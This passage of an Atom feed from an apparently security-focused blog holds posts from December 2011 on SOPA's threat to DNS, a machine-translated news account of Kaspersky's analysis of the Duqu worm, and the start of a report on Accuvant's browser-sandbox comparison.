based upon a notice delivered by the rights holder, which no neutral 
third party has even looked at, let alone adjudicated on the merits,” 
they write.&lt;br /&gt;


The team also echoes concerns from Sandia Labs and others that the laws would break the implementation of DNSSEC.
 Companies using the secure protocol could find themselves liable 
to legal action, some experts have warned, and the laws would encourage the 
formation of new, unregulated DNS systems that would fracture the 
overall structure of the internet.&lt;br /&gt;
&lt;br /&gt;


From a legal standpoint the proposed laws are almost certainly 
unconstitutional, the trio warns, since they can be used to deprive people of first 
amendment free speech rights without any access to a court hearing and 
with little or no evidence presented of a crime – indeed overseas 
website owners may not even be informed before a site is taken down.&lt;br /&gt;


&lt;h3&gt;
Who is leading the fightback?&lt;/h3&gt;
Some of the biggest names in the internet world have rallied to fight
 the current round of legislation, including some unlikely bedfellows. 
Vint Cerf and other leading luminaries have warned of the dangers, Google, Facebook and other online businesses are battling against it and Mozilla is mobilizing the open-source community. Even the Business Software Alliance has opposed it
 – and when the software industry’s anti-piracy goon squad doesn't like 
copyright legislation you know it has to be seriously flawed.&lt;br /&gt;
&lt;br /&gt;


News of the proposed changes has even reached China, where it is 
inspiring some bloggers to take the piss out of America for copying the 
Great Firewall of China. &lt;a href="http://advocacy.globalvoicesonline.org/2011/12/03/for-chinese-netizens-sopa-is-another-great-firewall/" target="_blank"&gt;Weiping Li, a blogger with Global Voices Advocacy&lt;/a&gt;, told &lt;i&gt;The Register&lt;/i&gt; that the similarities between the two countries were amusing some.&lt;br /&gt;


“Now they’re copying us to build up a wall. It’s like after climbing 
over the wall, we then bump into another one. It’s crazy!” said one web 
scribbler.&lt;br /&gt;
&lt;br /&gt;


Even the legislators themselves are &lt;a href="http://judiciary.house.gov/hearings/pdf/transcript12152011.pdf" target="_blank"&gt;expressing concern&lt;/a&gt;
 at the lack of technical expertise they can access during House 
Judiciary Committee hearings on the bills and the speed with which they 
are being asked to act.&lt;br /&gt;
&lt;br /&gt;


“When we had that last hearing, there wasn't a single person who 
could answer the technical questions, and they all admitted that, even 
though a couple of them still opined,” complained California congressman
 Dan Lungren.&lt;br /&gt;
&lt;br /&gt;


"But that is very unsatisfactory to me, and it ought to be very 
unsatisfactory to this committee, and it certainly ought to be very 
unsatisfactory to this institution. This is an extremely important 
issue. We better do it right, and I would just hope that we would take 
the time to do that.” ®&lt;br /&gt;


&lt;h3&gt;
Bootnote&lt;/h3&gt;
DNS, for the uninitiated, is the vital system that points browsers at
 websites when given a human-readable address, such as facebook.com or 
theregister.co.uk. Get removed from the DNS system and you can kiss 
goodbye to your traffic.&lt;br /&gt;

&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-6502808167874891386?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/wEOLplnKPQg" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/6502808167874891386/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/us-constitution-legal-eagles-anti.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/6502808167874891386?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/6502808167874891386?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/wEOLplnKPQg/us-constitution-legal-eagles-anti.html" title="US constitution - legal eagles, Anti-piracy laws will smash internet" /><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-vUefNflBkTM/TvE2rO2GryI/AAAAAAAAACM/E8RQvVPqieY/s72-c/piracy_is_a_crime_-_unskippable_anti-piracy_track.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/us-constitution-legal-eagles-anti.html</feedburner:origLink></entry><entry 
gd:etag="W/&quot;C0AMRn4_fCp7ImA9WhRQFkk.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-5382374079173303377</id><published>2011-12-11T21:42:00.001Z</published><updated>2011-12-11T22:16:27.044Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-11T22:16:27.044Z</app:edited><title>Duqu worm, a mystery to the laboratories of Security !</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/3ZXncseIsCDdD_Nai4Sbg6GE8QY/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3ZXncseIsCDdD_Nai4Sbg6GE8QY/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/3ZXncseIsCDdD_Nai4Sbg6GE8QY/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/3ZXncseIsCDdD_Nai4Sbg6GE8QY/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; The spread of many&lt;/span&gt; &lt;span class="hps"&gt;versions of&lt;/span&gt; &lt;span class="hps"&gt;malicious program&lt;/span&gt; &lt;span class="hps"&gt;Doqu&lt;/span&gt;, &lt;span class="hps"&gt;is major&lt;/span&gt; &lt;span class="hps"&gt;online&lt;/span&gt; &lt;span class="hps"&gt;news&lt;/span&gt; &lt;span class="hps"&gt;in the field of&lt;/span&gt; &lt;span class="hps"&gt;IT security.&lt;/span&gt; &lt;span class="hps"&gt;This is due&lt;/span&gt; &lt;span class="hps"&gt;largely to&lt;/span&gt; &lt;span class="hps"&gt;some similarities&lt;/span&gt; &lt;span class="hps"&gt;between this&lt;/span&gt; &lt;span class="hps"&gt;new&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;and&lt;/span&gt; "&lt;span class="hps"&gt;The &lt;/span&gt;&lt;span class="hps"&gt;Stuxnet worm"&lt;/span&gt; &lt;span class="hps"&gt;with a&lt;/span&gt; &lt;span class="hps"&gt;bad reputation that&lt;/span&gt; &lt;span class="hps"&gt;spread in the&lt;/span&gt; &lt;span class="hps"&gt;last year.&lt;/span&gt; &lt;span class="hps"&gt;But what is of&lt;/span&gt; &lt;span class="hps"&gt;concern in&lt;/span&gt; &lt;span class="hps"&gt;this case is that&lt;/span&gt; &lt;span class="hps"&gt;the ultimate goal of&lt;/span&gt; &lt;span class="hps"&gt;Doqu&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;is still&lt;/span&gt; &lt;span class="hps"&gt;unknown.&lt;/span&gt; &lt;span class="hps"&gt;Referred to&lt;/span&gt; &lt;span class="hps"&gt;experts&lt;/span&gt; &lt;span class="hps"&gt;in the&lt;/span&gt; &lt;span class="hps"&gt;fight against&lt;/span&gt; &lt;span class="hps"&gt;malicious programs&lt;/span&gt; &lt;span class="hps"&gt;Kaspersky Lab&lt;/span&gt; &lt;span class="hps"&gt;had conducted&lt;/span&gt; &lt;span class="hps"&gt;their analysis&lt;/span&gt; &lt;span class="hps"&gt;on the&lt;/span&gt; &lt;span 
class="hps"&gt;new&lt;/span&gt; &lt;span class="hps"&gt;malicious program&lt;/span&gt;&lt;span&gt;,&lt;/span&gt; &lt;span class="hps"&gt;and reached&lt;/span&gt; &lt;span class="hps"&gt;the main results&lt;/span&gt; &lt;span class="hps"&gt;we'll put it&lt;/span&gt; &lt;span class="hps"&gt;here.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-8uuLS6DH4uA/TuUrqoY4AaI/AAAAAAAAAB4/tBmsw6mXiII/s1600/trojan.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="224" src="http://1.bp.blogspot.com/-8uuLS6DH4uA/TuUrqoY4AaI/AAAAAAAAAB4/tBmsw6mXiII/s320/trojan.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;Duqu &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;was detected&lt;/span&gt; &lt;span class="hps"&gt;for the first&lt;/span&gt; &lt;span class="hps"&gt;time in&lt;/span&gt; &lt;span class="hps"&gt;early September&lt;/span&gt; &lt;span class="hps"&gt;2011. After an internet user in Hungary, download &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;a&lt;/span&gt; &lt;span class="hps"&gt;malicious program&lt;/span&gt; &lt;span class="hps"&gt;components&lt;/span&gt; &lt;span class="hps"&gt;on&lt;/span&gt; &lt;span class="hps"&gt;Virustotal,&lt;/span&gt; &lt;span class="hps"&gt;which analyzes the&lt;/span&gt; &lt;span class="hps"&gt;files&lt;/span&gt; &lt;span class="hps"&gt;infected&lt;/span&gt; &lt;span class="hps"&gt;by&lt;/span&gt; &lt;span class="hps"&gt;antivirus&lt;/span&gt; &lt;span class="hps"&gt;programs&lt;/span&gt; &lt;span class="hps"&gt;from different companies&lt;/span&gt; &lt;span class="hps"&gt;(including&lt;/span&gt; &lt;span class="hps"&gt;Kaspersky Lab). 
&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;But it turned out&lt;/span&gt; &lt;span class="hps"&gt;that the sample&lt;/span&gt; &lt;span class="hps"&gt;that was detected&lt;/span&gt; &lt;span class="hps"&gt;first&lt;/span&gt;, &lt;span class="hps"&gt;was just one&lt;/span&gt; &lt;span class="hps"&gt;of many&lt;/span&gt; &lt;span class="hps"&gt;components that&lt;/span&gt; &lt;span class="hps"&gt;make up the&lt;/span&gt; &lt;span class="hps"&gt;worm.&lt;/span&gt; &lt;span class="hps"&gt;After&lt;/span&gt; &lt;span class="hps"&gt;a brief period,&lt;/span&gt; &lt;span class="hps"&gt;and&lt;/span&gt; &lt;span class="hps"&gt;in a similar way&lt;/span&gt;&lt;span class=""&gt;,&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;some experts&lt;/span&gt; &lt;span class="hps"&gt;in the&lt;/span&gt; &lt;span class="hps"&gt;fight against&lt;/span&gt; &lt;span class="hps"&gt;malicious programs&lt;/span&gt; &lt;span class="hps"&gt;Kaspersky Lab&lt;/span&gt; &lt;span class="hps"&gt;found a sample of&lt;/span&gt; &lt;span class="hps"&gt;another unit&lt;/span&gt; &lt;span class="hps"&gt;of the worm&lt;/span&gt; &lt;span class="hps"&gt;through the&lt;/span&gt; &lt;span class="hps"&gt;site&lt;/span&gt; &lt;span class="hps"&gt;Virustotal, &lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;and allowed the&lt;/span&gt; &lt;span class="hps"&gt;analysis&lt;/span&gt; &lt;span class="hps"&gt;to find&lt;/span&gt; &lt;span class="hps"&gt;similarities&lt;/span&gt; &lt;span class="hps"&gt;between them and the&lt;/span&gt; &lt;span class="hps"&gt;Stuxnet&lt;/span&gt;&lt;span class=""&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;Although&lt;/span&gt; &lt;span class="hps"&gt;there are some&lt;/span&gt; &lt;span class="hps"&gt;general aspects&lt;/span&gt; &lt;span class="hps"&gt;of the similarity&lt;/span&gt; &lt;span class="hps"&gt;between&lt;/span&gt; the two worms &lt;span class="hps"&gt;Doqu&lt;/span&gt; &lt;span class="hps"&gt;and&lt;/span&gt; &lt;span class="hps"&gt;Stuxnet&lt;/span&gt;&lt;span class=""&gt;, but there are&lt;/span&gt; &lt;span class="hps"&gt;also significant differences.&lt;/span&gt; &lt;span class="hps"&gt;After&lt;/span&gt; &lt;span class="hps"&gt;a brief period&lt;/span&gt; &lt;span class="hps"&gt;of finding&lt;/span&gt; &lt;span class="hps"&gt;several types of&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;Doqu&lt;/span&gt;&lt;span&gt;,&lt;/span&gt; &lt;span class="hps"&gt;Kaspersky Lab&lt;/span&gt; &lt;span class="hps"&gt;experts began&lt;/span&gt; &lt;span class="hps"&gt;tracking&lt;/span&gt; &lt;span class="hps"&gt;the worm&lt;/span&gt; &lt;span class="hps"&gt;attempts&lt;/span&gt; &lt;span class="hps"&gt;to infect&lt;/span&gt; &lt;span class="hps"&gt;devices in&lt;/span&gt; &lt;span class="hps"&gt;real-time&lt;/span&gt; &lt;span class="hps"&gt;users of&lt;/span&gt; &lt;span class="hps"&gt;Kaspersky&lt;/span&gt; &lt;span class="hps"&gt;security&lt;/span&gt; &lt;span class="hps"&gt;based on&lt;/span&gt; &lt;span class="hps"&gt;the cloud.&lt;/span&gt; &lt;span class="hps"&gt;What is surprising&lt;/span&gt; &lt;span class="hps"&gt;is that during&lt;/span&gt; &lt;span class="hps"&gt;the first 24 hours&lt;/span&gt; &lt;span class="hps"&gt;the&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;infecting&lt;/span&gt; &lt;span class="hps"&gt;a single system&lt;/span&gt; &lt;span class="hps"&gt;only.&lt;/span&gt; &lt;span class="hps"&gt;On the other hand&lt;/span&gt;&lt;span&gt;, the&lt;/span&gt; &lt;span class="hps"&gt;Stuxnet&lt;/span&gt; 
&lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;infecting&lt;/span&gt; &lt;span class="hps"&gt;tens&lt;/span&gt; &lt;span class="hps"&gt;of thousands of&lt;/span&gt; &lt;span class="hps"&gt;systems&lt;/span&gt; &lt;span class="hps"&gt;throughout&lt;/span&gt; &lt;span class="hps"&gt;the world,&lt;/span&gt; &lt;span class="hps"&gt;and assumes,&lt;/span&gt; &lt;span class="hps"&gt;however,&lt;/span&gt; &lt;span class="hps"&gt;it was&lt;/span&gt; &lt;span class="hps"&gt;mainly aimed at&lt;/span&gt; &lt;span class="hps"&gt;industrial control&lt;/span&gt; &lt;span class="hps"&gt;systems&lt;/span&gt; &lt;span class="hps"&gt;used in&lt;/span&gt; &lt;span class="hps"&gt;Iran's nuclear programs&lt;/span&gt;&lt;span&gt;.&lt;/span&gt; &lt;span class="hps"&gt;The&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;Doku&lt;/span&gt;&amp;nbsp;&lt;span class="hps"&gt;&lt;/span&gt;&lt;span class="hps"&gt; ultimate goal&lt;/span&gt; &lt;span class="hps"&gt;is still unclear.&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class=""&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class=""&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;The only infection that is registered&lt;/span&gt;&lt;span class="hps"&gt;&lt;/span&gt; between KasperSky's users &lt;span class="hps"&gt;is an infection of&lt;/span&gt; &lt;span class="hps"&gt;one of&lt;/span&gt; &lt;span class="hps"&gt;multiple&lt;/span&gt; &lt;span class="hps"&gt;units&lt;/span&gt; &lt;span class="hps"&gt;that are supposed&lt;/span&gt; &lt;span class="hps"&gt;to constitute&lt;/span&gt; &lt;span class="hps"&gt;a worm&lt;/span&gt; &lt;span class="hps"&gt;Doqu&lt;/span&gt;&lt;span&gt;.&lt;/span&gt; &lt;span class="hps"&gt;It didn't found&lt;/span&gt; &lt;span class="hps"&gt;&lt;/span&gt;&lt;span class="hps"&gt;cases of infection through&lt;/span&gt; &lt;span class="hps"&gt;the second unit&lt;/span&gt;&lt;span&gt;, which is&lt;/span&gt;&lt;span&gt;, in essence&lt;/span&gt;&lt;span&gt;, a program&lt;/span&gt; &lt;span class="hps"&gt;separate&lt;/span&gt; &lt;span class="hps"&gt;from the&lt;/span&gt; &lt;span class="hps"&gt;malignant&lt;/span&gt; &lt;span class="hps"&gt;type of&lt;/span&gt; &lt;span class="hps"&gt;Trojan-Spy.&lt;/span&gt; &lt;span class="hps"&gt;It is noteworthy that&lt;/span&gt; &lt;span class="hps"&gt;this unit&lt;/span&gt; &lt;span class="hps"&gt;of&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;Doqu&lt;/span&gt; &lt;span class="hps"&gt;particular&lt;/span&gt; &lt;span class="hps"&gt;function&lt;/span&gt; &lt;span class="hps"&gt;that has the&lt;/span&gt; &lt;span class="hps"&gt;malware&lt;/span&gt;&lt;span&gt;,&lt;/span&gt; &lt;span class="hps"&gt;it collects&lt;/span&gt; &lt;span class="hps"&gt;information on&lt;/span&gt; &lt;span class="hps"&gt;the infected&lt;/span&gt; &lt;span class="hps"&gt;machine&lt;/span&gt; &lt;span class="hps"&gt;and&lt;/span&gt; &lt;span class="hps"&gt;also monitors&lt;/span&gt; &lt;span class="hps"&gt;the executing&lt;/span&gt; &lt;span class="hps"&gt;key&lt;/span&gt; &lt;span 
class="hps"&gt;clicks&lt;/span&gt; &lt;span class="hps"&gt;on the keyboard&lt;/span&gt; &lt;span class="hps"&gt;of the infected device&lt;/span&gt;&lt;span class="hps"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="long_text" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;In this&lt;/span&gt; &lt;span class="hps"&gt;context,&lt;/span&gt; &lt;/span&gt;&lt;span class="long_text" id="result_box" lang="en"&gt;&lt;span&gt;head of&lt;/span&gt; &lt;span class="hps"&gt;security experts&lt;/span&gt; &lt;span class="hps"&gt;at&lt;/span&gt; &lt;span class="hps"&gt;Kaspersky Lab&lt;/span&gt;&lt;span&gt; &lt;/span&gt;&lt;/span&gt;&lt;span class="long_text" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&lt;/span&gt;&lt;span class="hps"&gt;Alexander&lt;/span&gt; &lt;span class="hps"&gt;Gostev&lt;/span&gt;&lt;span&gt;,&lt;/span&gt;&lt;/span&gt;&lt;span class="long_text" id="result_box" lang="en"&gt;&lt;span class="hps"&gt; said&lt;/span&gt; &lt;span class="hps"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="long_text" id="result_box" lang="en"&gt;&lt;span&gt; &lt;/span&gt;&lt;span&gt;:&lt;/span&gt; &lt;span class="hps"&gt;"&lt;b&gt;I have not&lt;/b&gt;&lt;/span&gt;&lt;b&gt; &lt;span class="hps"&gt;come across&lt;/span&gt; &lt;span class="hps"&gt;yet any&lt;/span&gt; &lt;span class="hps"&gt;cases of&lt;/span&gt; &lt;span class="hps"&gt;infection&lt;/span&gt; &lt;span class="hps"&gt;on computers&lt;/span&gt; &lt;span class="hps"&gt;for our customers&lt;/span&gt; &lt;span class="hps"&gt;by means of a&lt;/span&gt; &lt;span class="hps"&gt;Trojan-Spy&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;Doku&lt;/span&gt;&lt;span&gt;.&lt;/span&gt; &lt;span class="hps"&gt;This means that the&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;Doqu&lt;/span&gt; &lt;span class="hps"&gt;may be directed against&lt;/span&gt; &lt;span class="hps"&gt;a small amount of&lt;/span&gt; &lt;span class="hps"&gt;specific objectives&lt;/span&gt;&lt;span&gt;, and can&lt;/span&gt; &lt;span class="hps"&gt;use&lt;/span&gt; &lt;span class="hps"&gt;different units&lt;/span&gt; &lt;span class="hps"&gt;to target&lt;/span&gt; &lt;span 
class="hps"&gt;each and every one&lt;/span&gt; &lt;/b&gt;&lt;span class="hps atn"&gt;&lt;b&gt;of them.&lt;/b&gt; "&lt;/span&gt;&lt;/span&gt;&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt; &lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="long_text" id="result_box" lang="en"&gt;&lt;span class="hps"&gt;Among the&lt;/span&gt; &lt;span class="hps"&gt;mysteries associated with&lt;/span&gt; &lt;span class="hps"&gt;Doqu&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;that has not been&lt;/span&gt; &lt;span class="hps"&gt;detected&lt;/span&gt; &lt;span class="hps"&gt;so far,&lt;/span&gt; &lt;span class="hps"&gt;the primary means&lt;/span&gt; &lt;span class="hps"&gt;used&lt;/span&gt; &lt;span class="hps"&gt;to penetrate&lt;/span&gt; &lt;span class="hps"&gt;the system:&lt;/span&gt; &lt;span class="hps"&gt;has not yet been&lt;/span&gt; &lt;span class="hps"&gt;found&lt;/span&gt; &lt;span class="hps"&gt;or&lt;/span&gt; &lt;span class="hps"&gt;installed&lt;/span&gt; &lt;span class="hps"&gt;"&lt;b&gt;the program&lt;/b&gt;&lt;/span&gt;&lt;b&gt; &lt;span class="hps"&gt;falling&lt;/span&gt;&lt;/b&gt;&lt;span class=""&gt;"&lt;/span&gt; &lt;span class="hps"&gt;to do so.&lt;/span&gt; &lt;span class="hps"&gt;The search for&lt;/span&gt; &lt;span class="hps"&gt;the&lt;/span&gt; &lt;span class="hps"&gt;unity&lt;/span&gt; &lt;span class="hps"&gt;of the&lt;/span&gt; &lt;span class="hps"&gt;worm&lt;/span&gt; &lt;span class="hps"&gt;Doqu&lt;/span&gt; &lt;span class="hps"&gt;still in progress,&lt;/span&gt; &lt;span class="hps"&gt;note&lt;/span&gt; &lt;span class="hps"&gt;that this unit&lt;/span&gt; &lt;span class="hps"&gt;in particular&lt;/span&gt; &lt;span class="hps"&gt;that will&lt;/span&gt; &lt;span class="hps"&gt;help us&lt;/span&gt; &lt;span class="hps"&gt;in finding the&lt;/span&gt; &lt;span class="hps"&gt;ultimate goal of this&lt;/span&gt; &lt;span class="hps"&gt;malicious program&lt;/span&gt;&lt;span&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="long_text" id="result_box" lang="en"&gt;&lt;span&gt;source : http://www.aitnews.com.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="long_text" id="result_box" lang="en"&gt;&lt;span&gt;Translated by : Tahar ZoFix.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1852691838866274693-5382374079173303377?l=sahara-sec.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SaharaSecurityBlog/~4/YJje2DyHp3A" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://sahara-sec.blogspot.com/feeds/5382374079173303377/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://sahara-sec.blogspot.com/2011/12/duqu-worm-mystery-to-laboratories-of.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/5382374079173303377?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/1852691838866274693/posts/default/5382374079173303377?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/SaharaSecurityBlog/~3/YJje2DyHp3A/duqu-worm-mystery-to-laboratories-of.html" title="Duqu worm, a mystery to the laboratories of Security !" 
/><author><name>Tahar ZoFix</name><uri>http://www.blogger.com/profile/12806873291694404725</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="28" src="http://2.bp.blogspot.com/-kBmAbMEW2D4/TvXWA7-n37I/AAAAAAAAADg/YEyEYsmhKt0/s220/SSB-Logo.png" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-8uuLS6DH4uA/TuUrqoY4AaI/AAAAAAAAAB4/tBmsw6mXiII/s72-c/trojan.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://sahara-sec.blogspot.com/2011/12/duqu-worm-mystery-to-laboratories-of.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkAMQng9fip7ImA9WhRQFUs.&quot;"><id>tag:blogger.com,1999:blog-1852691838866274693.post-6229407681719528988</id><published>2011-12-11T01:40:00.001Z</published><updated>2011-12-11T01:59:43.666Z</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-11T01:59:43.666Z</app:edited><title>New study - Chrome is number One !</title><content type="html">
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/zDh4HIHh0n_kAgWdFVrA3KLteBg/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/zDh4HIHh0n_kAgWdFVrA3KLteBg/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/zDh4HIHh0n_kAgWdFVrA3KLteBg/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/zDh4HIHh0n_kAgWdFVrA3KLteBg/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; A new study shows that Google Chrome is the most secure of the mainstream browsers, followed by Internet Explorer, with Firefox last.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-dzLauS6aPLw/TuQLxySF2pI/AAAAAAAAABo/z60y3Ic3gw8/s1600/chrome-205_noshadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-dzLauS6aPLw/TuQLxySF2pI/AAAAAAAAABo/z60y3Ic3gw8/s1600/chrome-205_noshadow.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&amp;nbsp; Google Chrome offers more protection against online attacks than any 
other mainstream browser, according to an evaluation that compares 
exploit mitigations, malicious link detection, and other safety features
 offered in Chrome, Internet Explorer, and Firefox.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; The 102-page report, prepared by researchers from security firm 
Accuvant, started with the premise that buffer overflow bugs and other 
security vulnerabilities were inevitable in any complex piece of 
software. Rather than relying on metrics such as the number of flaws 
fixed or the amount of time it took to release updates, the authors 
examined the practical effect protections included by default in each 
browser had on a wide class of exploits.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; Their conclusion: Chrome is the most secure browser, followed 
closely by Microsoft's IE. Mozilla's open-source Firefox came in third, 
largely because it omits a security sandbox that shields vital
 parts of the Windows operating system from the code that parses 
JavaScript, images and other web content.&lt;br /&gt;
"We found that Google Chrome did the most sandboxing," Chris Valasek, who is a senior research scientist for Accuvant, told &lt;i&gt;The Register&lt;/i&gt;.
 "It restricted the movements more than any other browser. Internet 
Explorer came up a close second because it implemented a sandbox where 
you could do certain things but you were allowed to do more things than 
you could in Chrome. Lastly, Firefox came in last because it didn't 
implement a sandbox yet."&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; The report was commissioned by Google, but the authors insist they 
had complete autonomy in deciding what metrics to use and what 
conclusions they made. The researchers have released more than &lt;a href="http://www.accuvant.com/capability/accuvant-labs/security-research/browser-security-comparison-quantitative-approach" target="_blank"&gt;20MB worth of data, software tools, and methodology&lt;/a&gt;
 so peers may review or build upon the research. The study focused 
solely on the security offered by Chrome, IE, and Firefox, which when 
combined account for more than 93 percent of web users, according to the
 report. All three browsers tested were run on Windows 7.&lt;br /&gt;
Their finding is backed up by anecdotal evidence as well. Chrome has emerged unscathed from the annual Pwn2Own hacker contest
 for three years in a row, something no other browser entered has done. 
Reports of in-the-wild exploits that target the browser are also 
extremely rare.&lt;br /&gt;
&lt;h3&gt;

Not all sandboxes are equal&lt;/h3&gt;
In much the way traditional sandboxes prevent sand from mixing with 
